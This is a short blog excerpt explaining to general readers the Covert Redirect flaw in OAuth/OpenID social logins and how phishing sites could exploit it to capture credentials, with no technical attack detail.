“… it’s not easy to fix, and any effective remedies would negatively impact the user experience. Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws.”
– Jeremiah Grossman, founder and interim CEO at WhiteHat Security
If you visit a lot of different websites, you’ve probably seen some that allow you to login using your Facebook or Google accounts. This is meant to make it easier for everyone; you don’t have to create a new account and remember a separate password and the site owners don’t have to maintain their own membership system.
Unfortunately, there’s a security flaw in the software that enables websites to accept your login information from other sites. Just like with the Heartbleed bug, this is in open-source software used by a number of popular websites. This time, it’s the OAuth and OpenID software and the bug enables “phishing” sites, websites that are specifically designed to get people’s personal information usually by mimicking reputable sites, to grab the Facebook / Google / etc. login information that you enter and then redirect you to a malicious website. This could enable the hackers to get a fair amount of your information or even take over your accounts on the legitimate sites.
Read More “Covert Redirect bug (OAuth / OpenID) – What you need to know …” »
